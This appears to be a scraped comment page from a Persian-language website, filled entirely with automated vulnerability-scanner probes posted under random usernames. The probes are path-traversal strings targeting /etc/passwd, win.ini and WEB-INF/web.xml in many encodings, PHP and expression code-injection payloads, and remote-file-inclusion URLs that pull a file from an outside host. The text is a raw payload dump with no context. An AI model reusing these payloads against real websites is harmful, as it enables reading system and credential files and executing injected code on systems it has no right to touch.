${9999094+9999428}
djcldynl چهارشنبه, 14 شهریور,1397 02:43
${10000247+10000302}
djcldynl چهارشنبه, 14 شهریور,1397 02:43
${9999560+9999388}
djcldynl چهارشنبه, 14 شهریور,1397 02:43
${10000144+9999027}
djcldynl چهارشنبه, 14 شهریور,1397 02:43
${10000343+10000138}
djcldynl چهارشنبه, 14 شهریور,1397 02:44
${9999090+9999569}
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
1
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../../../../../../../../../../etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../../../../../../../../../../../../../../../proc/version
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../../../../../../../../../../etc/passwd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
%2fetc%2fpasswd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/.././.././.././.././.././.././.././../etc/./passwd%00
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
file:///etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/\../\../\../\../\../\../\../etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
WEB-INF/web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/WEB-INF/web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
WEB-INF\web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../../../../../../../../../../windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
C:\WINDOWS\system32\drivers\etc\hosts
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../../../../../../../../../../windows/win.ini%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
................windowswin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:44
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
sujupaoo چهارشنبه, 14 شهریور,1397 02:44
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
sujupaoo چهارشنبه, 14 شهریور,1397 02:44
1some_inexistent_file_with_long_name%00.jpg
sujupaoo چهارشنبه, 14 شهریور,1397 02:44
Http://testasp.vulnweb.com/t/fit.txt
sujupaoo چهارشنبه, 14 شهریور,1397 02:44
http://testasp.vulnweb.com/t/fit.txt%3F.jpg
sujupaoo چهارشنبه, 14 شهریور,1397 02:44
testasp.vulnweb.com
qiblaqge چهارشنبه, 14 شهریور,1397 02:45
;print(md5(acunetix_wvs_security_test));
qiblaqge چهارشنبه, 14 شهریور,1397 02:45
';print(md5(acunetix_wvs_security_test));$a='
qiblaqge چهارشنبه, 14 شهریور,1397 02:45
";print(md5(acunetix_wvs_security_test));$a="
qiblaqge چهارشنبه, 14 شهریور,1397 02:45
${@print(md5(acunetix_wvs_security_test))}
qiblaqge چهارشنبه, 14 شهریور,1397 02:45
${@print(md5(acunetix_wvs_security_test))}\
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
WEB-INF/web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
WEB-INF\web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../../../../../../../../../../etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../../../../../../../../../../../../../../../proc/version
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../../../../../../../../../../etc/passwd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
%2fetc%2fpasswd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/.././.././.././.././.././.././.././../etc/./passwd%00
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
file:///etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/\../\../\../\../\../\../\../etc/passwd
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/WEB-INF/web.xml
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../../../../../../../../../../windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
C:\WINDOWS\system32\drivers\etc\hosts
;print(md5(acunetix_wvs_security_test)); چهارشنبه, 14 شهریور,1397 02:45
1
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../../../../../../../../../../windows/win.ini%00.jpg
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
................windowswin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
xsmavkeo چهارشنبه, 14 شهریور,1397 02:45
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
qiblaqge چهارشنبه, 14 شهریور,1397 02:46
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:48
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:49
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:50
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:50
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:51
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:52
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:53
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:54
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:55
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:57
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:57
1
qiblaqge چهارشنبه, 14 شهریور,1397 02:58
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:00
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:01
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:02
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:03
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:04
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:05
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:07
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:08
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:09
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:10
1
qiblaqge چهارشنبه, 14 شهریور,1397 03:11
1
